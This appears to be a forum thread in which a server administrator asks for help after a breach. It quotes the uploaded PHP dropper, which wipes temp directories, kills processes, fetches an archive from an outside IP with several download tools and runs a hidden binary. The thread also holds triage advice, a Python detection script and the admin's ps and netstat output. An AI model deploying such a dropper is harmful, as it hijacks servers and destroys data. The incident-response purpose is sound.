HELP! Attack!

Hello,

One of my servers has recently been successfully attacked from a Ukrainian IP.
Through a website (which has been removed in the meantime) they managed to upload malicious PHP code:

<?php
system("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& ");
shell_exec("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& ");
exec("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& ");
passthru("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& ");
?>

This was spotted by Maldetect, but too late. The executable has been run and files have been downloaded to the server. Since then I regularly have to reboot the server to keep the websites online. Something, somewhere, is killing what I suspect is the DNS server.

Help!

  • How can I see from where access is gained to the server?
  • How can I stop services being stopped?
  • The files in the tmp folders I found have been deleted.

I ran a quite aggressive Maldetect scan after the issue was discovered, but only false positives were detected and quarantined.

Thanks!

--------EDIT---------
Should I reinstall some packages? (ssh2, dns?)
If so, how? If not, should I reinstall the server? Should I make a full backup? Won’t that include the malicious code?

Some tips I use on my servers to find malicious code:

  • Is there a PHP script or other file called from these IPs? grep POST /var/log/apache2/access_log or grep THE_IP /var/log/apache2/access_log
  • Get the files in your web directories that have been modified since the last day (or more); these can have been corrupted by the attack: find /var/www -mtime -1 -type f
  • What services are running on your server? ps aux, find the PID, and check the content of /proc/$pid/
  • you can also see the connections made to your server: netstat -n

Good luck !

Guillaume
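The four checks above, as one script. This is an added example, not code from the thread or from any of the posters: the Apache log lines and the netstat -ln sample are constructed for the example, the "PHP under an upload directory" heuristic and the /proc checks are my own assumptions about what a dropper like the one posted above looks like on a live host, and the allowlist of ports is something you fill in from your own server.

```python
"""Triage helpers for the four checks above (added example, not from the
thread): access-log hits, recently modified web files, processes living in
/tmp or running a deleted binary, and unexpected listening ports.
Every sample input below is constructed; nothing here is from the real host.
"""
import os
import re
import time

# Apache "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed log lines; 198.51.100.23 plays the attacker, infi.php the dropper.
SAMPLE_LOG = """\
203.0.113.7 - - [11/May/2014:03:14:09 +0200] "GET /wp-login.php HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
198.51.100.23 - - [11/May/2014:03:14:10 +0200] "POST /wp-content/uploads/infi.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.23 - - [11/May/2014:03:14:11 +0200] "GET /wp-content/uploads/infi.php?cmd=id HTTP/1.1" 200 44 "-" "Mozilla/5.0"
203.0.113.7 - - [11/May/2014:03:15:00 +0200] "GET /index.php HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
"""

# Constructed `netstat -ln` output (numeric ports, listening sockets only).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:10000           0.0.0.0:*
"""


def parse_access_log(text):
    """Yield one dict per line that matches the combined log format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def suspicious_requests(text, suspect_ips=()):
    """Every hit from a suspect IP, plus any request (GET or POST) that runs a
    PHP file under an upload directory. grep POST alone misses a shell that
    is triggered with GET, which is why both methods are kept."""
    hits = []
    for r in parse_access_log(text):
        path = r["path"].split("?", 1)[0]
        if r["ip"] in suspect_ips or (path.endswith(".php") and "/uploads/" in path):
            hits.append((r["ip"], r["method"], r["path"]))
    return hits


def recently_modified(root, days=1, now=None):
    """Regular files under root changed within the last `days` days
    (the Python form of `find root -mtime -days -type f`)."""
    cutoff = (time.time() if now is None else now) - days * 86400
    found = []
    for d, _, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            try:
                if os.lstat(p).st_mtime >= cutoff:
                    found.append(p)
            except OSError:
                continue
    return sorted(found)


def suspicious_processes(proc="/proc"):
    """PIDs whose binary was unlinked after start (self-deleting malware)
    or whose working directory is a world-writable tmp directory."""
    out = []
    if not os.path.isdir(proc):
        return out
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            exe = os.readlink(os.path.join(proc, pid, "exe"))
            cwd = os.readlink(os.path.join(proc, pid, "cwd"))
        except OSError:
            continue  # kernel thread, or a process we are not allowed to inspect
        if exe.endswith(" (deleted)") or cwd in ("/tmp", "/var/tmp", "/dev/shm"):
            out.append((int(pid), exe, cwd))
    return out


def unexpected_listeners(netstat_text, allowed_ports):
    """Listening TCP/UDP ports from `netstat -ln` output that are not in the allowlist."""
    ports = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] in ("tcp", "tcp6", "udp", "udp6"):
            ports.add(int(parts[3].rsplit(":", 1)[1]))
    return sorted(ports - set(allowed_ports))


if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG, {"198.51.100.23"}))
    print(unexpected_listeners(SAMPLE_NETSTAT, {22, 53, 80, 443}))
    print(recently_modified("/var/www", days=1))
    print(suspicious_processes())
```

Run it as root so /proc/PID/exe is readable for every process; feed the real access log and `netstat -ln` output to the two parsers and put the ports you deliberately opened in the allowlist. A hit from `suspicious_processes` is the kind of thing `ps aux` alone will not show, because the command name is whatever the binary called itself.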

Dear Guillaume,

Thanks very much for your response.
Looking for POST in my log files did not yield anything.
I searched for the last 10000 changed files when I discovered the intrusion and found that all files had been quarantined.
ps aux yields the following. However, I am not sure about this. Do you see anything suspicious?

# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19232 1524 ? Ss 08:42 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 08:42 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 08:42 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S 08:42 0:00 [migration/0]
root 6 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S 08:42 0:00 [migration/1]
root 8 0.0 0.0 0 0 ? S 08:42 0:00 [migration/1]
root 9 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/1]
root 10 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/1]
root 11 0.0 0.0 0 0 ? S 08:42 0:00 [migration/2]
root 12 0.0 0.0 0 0 ? S 08:42 0:00 [migration/2]
root 13 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/2]
root 14 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/2]
root 15 0.0 0.0 0 0 ? S 08:42 0:00 [migration/3]
root 16 0.0 0.0 0 0 ? S 08:42 0:00 [migration/3]
root 17 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/3]
root 18 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/3]
root 19 0.0 0.0 0 0 ? S 08:42 0:00 [migration/4]
root 20 0.0 0.0 0 0 ? S 08:42 0:00 [migration/4]
root 21 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/4]
root 22 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/4]
root 23 0.0 0.0 0 0 ? S 08:42 0:00 [migration/5]
root 24 0.0 0.0 0 0 ? S 08:42 0:00 [migration/5]
root 25 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/5]
root 26 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/5]
root 27 0.0 0.0 0 0 ? S 08:42 0:00 [migration/6]
root 28 0.0 0.0 0 0 ? S 08:42 0:00 [migration/6]
root 29 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/6]
root 30 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/6]
root 31 0.0 0.0 0 0 ? S 08:42 0:00 [migration/7]
root 32 0.0 0.0 0 0 ? S 08:42 0:00 [migration/7]
root 33 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/7]
root 34 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/7]
root 35 0.0 0.0 0 0 ? S 08:42 0:00 [events/0]
root 36 0.0 0.0 0 0 ? S 08:42 0:00 [events/1]
root 37 0.0 0.0 0 0 ? S 08:42 0:00 [events/2]
root 38 0.0 0.0 0 0 ? S 08:42 0:00 [events/3]
root 39 0.0 0.0 0 0 ? S 08:42 0:00 [events/4]
root 40 0.0 0.0 0 0 ? S 08:42 0:00 [events/5]
root 41 0.0 0.0 0 0 ? S 08:42 0:00 [events/6]
root 42 0.0 0.0 0 0 ? S 08:42 0:00 [events/7]
root 43 0.0 0.0 0 0 ? S 08:42 0:00 [cgroup]
root 44 0.0 0.0 0 0 ? S 08:42 0:00 [khelper]
root 45 0.0 0.0 0 0 ? S 08:42 0:00 [netns]
root 46 0.0 0.0 0 0 ? S 08:42 0:00 [async/mgr]
root 47 0.0 0.0 0 0 ? S 08:42 0:00 [pm]
root 48 0.0 0.0 0 0 ? S 08:42 0:00 [sync_supers]
root 49 0.0 0.0 0 0 ? S 08:42 0:00 [bdi-default]
root 50 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/0]
root 51 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/1]
root 52 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/2]
root 53 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/3]
root 54 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/4]
root 55 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/5]
root 56 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/6]
root 57 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/7]
root 58 0.0 0.0 0 0 ? S 08:42 0:02 [kblockd/0]
root 59 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/1]
root 60 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/2]
root 61 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/3]
root 62 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/4]
root 63 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/5]
root 64 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/6]
root 65 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/7]
root 66 0.0 0.0 0 0 ? S 08:42 0:00 [kacpid]
root 67 0.0 0.0 0 0 ? S 08:42 0:00 [kacpi_notify]
root 68 0.0 0.0 0 0 ? S 08:42 0:00 [kacpi_hotplug]
root 69 0.0 0.0 0 0 ? S 08:42 0:00 [ata_aux]
root 70 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/0]
root 71 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/1]
root 72 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/2]
root 73 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/3]
root 74 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/4]
root 75 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/5]
root 76 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/6]
root 77 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/7]
root 78 0.0 0.0 0 0 ? S 08:42 0:00 [ksuspend_usbd]
root 79 0.0 0.0 0 0 ? S 08:42 0:00 [khubd]
root 80 0.0 0.0 0 0 ? S 08:42 0:00 [kseriod]
root 81 0.0 0.0 0 0 ? S 08:42 0:00 [md/0]
root 82 0.0 0.0 0 0 ? S 08:42 0:00 [md/1]
root 83 0.0 0.0 0 0 ? S 08:42 0:00 [md/2]
root 84 0.0 0.0 0 0 ? S 08:42 0:00 [md/3]
root 85 0.0 0.0 0 0 ? S 08:42 0:00 [md/4]
root 86 0.0 0.0 0 0 ? S 08:42 0:00 [md/5]
root 87 0.0 0.0 0 0 ? S 08:42 0:00 [md/6]
root 88 0.0 0.0 0 0 ? S 08:42 0:00 [md/7]
root 89 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/0]
root 90 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/1]
root 91 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/2]
root 92 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/3]
root 93 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/4]
root 94 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/5]
root 95 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/6]
root 96 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/7]
root 97 0.0 0.0 0 0 ? S 08:42 0:00 [linkwatch]
root 98 0.0 0.0 0 0 ? S 08:42 0:00 [khungtaskd]
root 99 0.0 0.0 0 0 ? S 08:42 0:00 [kswapd0]
root 100 0.0 0.0 0 0 ? SN 08:42 0:00 [ksmd]
root 101 0.0 0.0 0 0 ? SN 08:42 0:00 [khugepaged]
root 102 0.0 0.0 0 0 ? S 08:42 0:00 [aio/0]
root 103 0.0 0.0 0 0 ? S 08:42 0:00 [aio/1]
root 104 0.0 0.0 0 0 ? S 08:42 0:00 [aio/2]
root 105 0.0 0.0 0 0 ? S 08:42 0:00 [aio/3]
root 106 0.0 0.0 0 0 ? S 08:42 0:00 [aio/4]
root 107 0.0 0.0 0 0 ? S 08:42 0:00 [aio/5]
root 108 0.0 0.0 0 0 ? S 08:42 0:00 [aio/6]
root 109 0.0 0.0 0 0 ? S 08:42 0:00 [aio/7]
root 110 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/0]
root 111 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/1]
root 112 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/2]
root 113 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/3]
root 114 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/4]
root 115 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/5]
root 116 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/6]
root 117 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/7]
root 122 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/0]
root 123 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/1]
root 124 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/2]
root 125 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/3]
root 126 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/4]
root 127 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/5]
root 128 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/6]
root 129 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/7]
root 131 0.0 0.0 0 0 ? S 08:42 0:00 [kpsmoused]
root 132 0.0 0.0 0 0 ? S 08:42 0:00 [usbhid_resumer]
root 162 0.0 0.0 0 0 ? S 08:42 0:00 [kstriped]
root 336 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_0]
root 337 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_1]
root 338 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_2]
root 339 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_3]
root 340 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_4]
root 341 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_5]
root 480 0.0 0.0 0 0 ? S 08:42 0:00 [md1_raid1]
root 485 0.0 0.0 0 0 ? S 08:42 0:05 [md2_raid1]
root 491 0.0 0.0 0 0 ? S 08:42 0:00 [md0_raid1]
root 517 0.0 0.0 0 0 ? S 08:42 0:01 [jbd2/md2-8]
root 518 0.0 0.0 0 0 ? S 08:42 0:00 [ext4-dio-unwrit]
root 595 0.0 0.0 10648 736 ? S<s 08:42 0:00 /sbin/udevd -d
root 943 0.0 0.0 0 0 ? S 08:42 0:01 [kondemand/0]
root 944 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/1]
root 945 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/2]
root 946 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/3]
root 947 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/4]
root 948 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/5]
root 949 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/6]
root 950 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/7]
root 986 0.0 0.0 0 0 ? S 08:42 0:03 [flush-9:2]
root 987 0.0 0.0 0 0 ? S 08:42 0:00 [kjournald]
root 1058 0.0 0.0 0 0 ? S 08:42 0:00 [kauditd]
root 1300 0.0 0.0 27664 856 ? S<sl 08:42 0:00 auditd
root 1325 0.0 0.0 249084 1704 ? Sl 08:42 0:00 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
named 1339 0.0 0.0 702716 27460 ? Ssl 08:42 0:00 /usr/sbin/named -u named
dbus 1366 0.0 0.0 21404 872 ? Ss 08:42 0:00 dbus-daemon --system
root 1396 0.0 0.0 4080 636 ? Ss 08:42 0:00 /usr/sbin/acpid
root 1430 0.0 0.0 66608 1176 ? Ss 08:42 0:00 /usr/sbin/sshd
clam 1439 0.0 0.8 443804 273360 ? Ssl 08:42 0:06 clamd
root 1475 0.0 0.0 108168 1572 ? S 08:42 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/u
mysql 1613 0.0 0.4 1058148 139068 ? Sl 08:42 0:06 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.
postgres 1656 0.0 0.0 207872 6180 ? S 08:42 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
postgres 1658 0.0 0.0 179284 1500 ? Ss 08:42 0:00 postgres: logger process
postgres 1660 0.0 0.0 207872 1900 ? Ss 08:42 0:00 postgres: writer process
postgres 1661 0.0 0.0 207872 1684 ? Ss 08:42 0:00 postgres: wal writer process
postgres 1662 0.0 0.0 208444 2340 ? Ss 08:42 0:01 postgres: autovacuum launcher process
postgres 1663 0.0 0.0 179832 2024 ? Ss 08:42 0:02 postgres: stats collector process
root 1673 0.0 0.0 19264 780 ? Ss 08:42 0:00 /usr/sbin/dovecot
dovecot 1674 0.0 0.0 12984 1072 ? S 08:42 0:00 dovecot/anvil
root 1676 0.0 0.0 13112 1184 ? S 08:42 0:00 dovecot/log
root 1685 0.0 0.0 68904 1688 ? Ss 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1686 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1687 0.0 0.0 68904 1700 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1688 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1689 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1699 0.0 0.1 241244 51168 ? Ss 08:42 0:01 /usr/bin/spamd -d -c -m5 -H -r /var/run/spamd.pid
root 1700 0.0 0.1 254732 64756 ? S 08:42 0:07 spamd child
root 1701 0.0 0.1 241244 48632 ? S 08:42 0:00 spamd child
root 1777 0.0 0.0 81284 3388 ? Ss 08:42 0:00 /usr/libexec/postfix/master
postfix 1786 0.0 0.0 81540 3504 ? S 08:42 0:00 qmgr -l -t fifo -u
nobody 1787 0.0 0.0 150440 2020 ? Ss 08:42 0:00 proftpd: (accepting connections)
root 1795 0.0 0.0 463868 21880 ? Ss 08:42 0:00 /usr/sbin/httpd
apache 1801 0.0 0.0 249436 5620 ? S 08:42 0:00 /usr/sbin/httpd
root 1804 0.0 0.0 117324 1312 ? Ss 08:42 0:00 crond
root 1813 0.1 0.0 1035272 14120 ? Sl 08:42 0:17 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -x
root 1847 0.0 0.0 21540 480 ? Ss 08:42 0:00 /usr/sbin/atd
apache 1887 0.0 0.0 464700 13200 ? S 08:42 0:00 /usr/sbin/httpd
apache 1888 0.0 0.0 464828 13312 ? S 08:42 0:00 /usr/sbin/httpd
apache 1889 0.0 0.0 464768 13224 ? S 08:42 0:00 /usr/sbin/httpd
apache 1890 0.0 0.0 464712 12984 ? S 08:42 0:00 /usr/sbin/httpd
apache 1891 0.0 0.0 464700 13216 ? S 08:42 0:00 /usr/sbin/httpd
apache 1892 0.0 0.0 464724 13256 ? S 08:42 0:00 /usr/sbin/httpd
apache 1893 0.0 0.0 464456 13096 ? S 08:42 0:00 /usr/sbin/httpd
apache 1894 0.0 0.0 464700 13208 ? S 08:42 0:00 /usr/sbin/httpd
519 1895 0.0 0.1 423844 49580 ? S 08:42 0:03 /usr/bin/php-cgi
mailman 1901 0.0 0.0 203976 8724 ? Ss 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/mailmanctl -s -q start
509 1922 0.2 0.0 396452 29164 ? S 08:42 0:22 /usr/bin/php-cgi
mailman 1923 0.0 0.0 206188 11564 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=ArchRunner:0:1 -s
mailman 1924 0.0 0.0 206240 11636 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=BounceRunner:0:1 -s
mailman 1925 0.0 0.0 206184 11728 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=CommandRunner:0:1 -s
mailman 1926 0.0 0.0 206216 11636 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=IncomingRunner:0:1 -s
mailman 1927 0.0 0.0 206176 11636 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=NewsRunner:0:1 -s
mailman 1928 0.0 0.0 206220 11696 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=OutgoingRunner:0:1 -s
mailman 1929 0.0 0.0 206268 11576 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=VirginRunner:0:1 -s
mailman 1930 0.0 0.0 206184 11568 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=RetryRunner:0:1 -s
root 1932 0.0 0.1 185924 52472 ? Ss 08:42 0:00 /usr/libexec/webmin/virtual-server/lookup-domain-daemon.pl
root 1943 0.0 0.0 87572 16580 ? Ss 08:42 0:00 /usr/bin/perl /usr/libexec/usermin/miniserv.pl /etc/usermin/miniserv.conf
519 1956 0.0 0.1 421404 49072 ? S 08:42 0:01 /usr/bin/php-cgi
root 1957 0.0 0.0 88076 17436 ? Ss 08:42 0:00 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
root 1965 0.0 0.0 4064 576 tty1 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty1
root 1967 0.0 0.0 4064 580 tty2 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty2
root 1969 0.0 0.0 4064 580 tty3 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty3
root 1971 0.0 0.0 4064 580 tty4 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty4
root 1973 0.0 0.0 4064 572 tty5 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty5
root 1975 0.0 0.0 4064 580 tty6 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty6
root 1979 0.0 0.0 10968 1060 ? S< 08:42 0:00 /sbin/udevd -d
user1 1982 0.0 0.1 303680 32788 ? S 08:42 0:01 /usr/bin/php-cgi
root 2071 0.0 0.0 100372 4208 ? Ss 08:44 0:00 sshd: remi [priv]
user2 2074 0.1 0.1 322696 52188 ? S 08:44 0:14 /usr/bin/php-cgi
remi 2077 0.0 0.0 100372 2132 ? S 08:44 0:00 sshd: remi@pts/0
remi 2078 0.0 0.0 108304 1880 pts/0 Ss 08:44 0:00 -bash
root 2097 0.0 0.0 145436 1712 pts/0 S 08:44 0:00 su
root 2098 0.0 0.0 108436 2016 pts/0 S+ 08:44 0:00 bash
apache 2114 0.0 0.0 464700 13208 ? S 08:44 0:00 /usr/sbin/httpd
gswp 2414 0.0 0.1 309532 43056 ? S 08:48 0:00 /usr/bin/php-cgi
gswp 2415 0.0 0.1 323128 51852 ? S 08:48 0:00 /usr/bin/php-cgi
postfix 2435 0.0 0.0 81360 3396 ? S 08:49 0:00 tlsmgr -l -t unix -u
apache 3248 0.0 0.0 464752 13212 ? S 08:59 0:00 /usr/sbin/httpd
534 4917 0.0 0.0 400268 32660 ? S 09:01 0:00 /usr/bin/php-cgi
root 5437 0.0 0.0 100368 4092 ? Ss 09:05 0:00 sshd: remi [priv]
remi 5443 0.0 0.0 100368 2052 ? S 09:05 0:00 sshd: remi@pts/1
remi 5444 0.0 0.0 108304 1880 pts/1 Ss 09:05 0:00 -bash
root 5464 0.0 0.0 145436 1712 pts/1 S 09:05 0:00 su
root 5468 0.0 0.0 108436 2064 pts/1 S 09:05 0:00 bash
user 18064 0.2 0.1 330260 54636 ? S 09:31 0:16 /usr/bin/php-cgi
534 8167 0.0 0.1 419884 45680 ? S 09:35 0:00 /usr/bin/php-cgi
dovecot 8578 0.0 0.0 76612 2940 ? S 09:40 0:00 dovecot/auth
509 10465 0.1 0.0 395048 27932 ? S 10:00 0:08 /usr/bin/php-cgi
apache 11721 0.0 0.0 464816 13212 ? S 10:12 0:00 /usr/sbin/httpd
postfix 12305 0.0 0.0 81364 3364 ? S 10:17 0:00 pickup -l -t fifo -u
user 2 12308 0.0 0.1 323328 47700 ? S 10:17 0:00 /usr/bin/php-cgi
root 15057 0.0 0.0 15088 3204 ? S 10:40 0:00 dovecot/config
root 15348 0.0 0.0 10644 720 ? S< 10:43 0:00 /sbin/udevd -d
root 15349 0.0 0.0 0 0 ? S 10:43 0:00 [bluetooth]
root 16135 0.0 0.0 76760 3264 ? S 10:51 0:00 dovecot/auth -w
postfix 18114 0.0 0.0 99872 6624 ? S 11:16 0:00 smtpd -n smtp -t inet -u -o stress= -o smtpd_sasl_auth_enable=yes
postfix 18116 0.0 0.0 81356 3312 ? S 11:16 0:00 anvil -l -t unix -u
postfix 18118 0.0 0.0 82040 4300 ? S 11:16 0:00 cleanup -z -t unix -u
postfix 18119 0.0 0.0 81664 4080 ? S 11:16 0:00 local -t unix
postfix 18141 0.0 0.0 81568 3664 ? S 11:16 0:00 smtp -t unix -u
root 18255 0.0 0.0 110228 1176 pts/1 R+ 11:18 0:00 ps aux

The user account attached to the hacked site does not appear in this list.
I am afraid that the b5.tar file that was downloaded contains executables that have been placed on the server and provide backdoors.

netstat -l yields the following result:

netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:submission *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 localhost:dyna-access *:* LISTEN
tcp 0 0 localhost:783 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:urd *:* LISTEN
tcp 0 0 *:20050 *:* LISTEN
tcp 0 0 *:20051 *:* LISTEN
tcp 0 0 static.253.54.251.14:domain *:* LISTEN
tcp 0 0 static.252.54.251.14:domain *:* LISTEN
tcp 0 0 exalt1.remisan.be:domain *:* LISTEN
tcp 0 0 localhost:domain *:* LISTEN
tcp 0 0 localhost:irisa *:* LISTEN
tcp 0 0 localhost:postgres *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 localhost:rndc *:* LISTEN
tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:domain *:* LISTEN
tcp 0 0 ip6-localhost:rndc *:* LISTEN
tcp 0 0 *:20442 *:* LISTEN
tcp 0 0 *:https *:* LISTEN
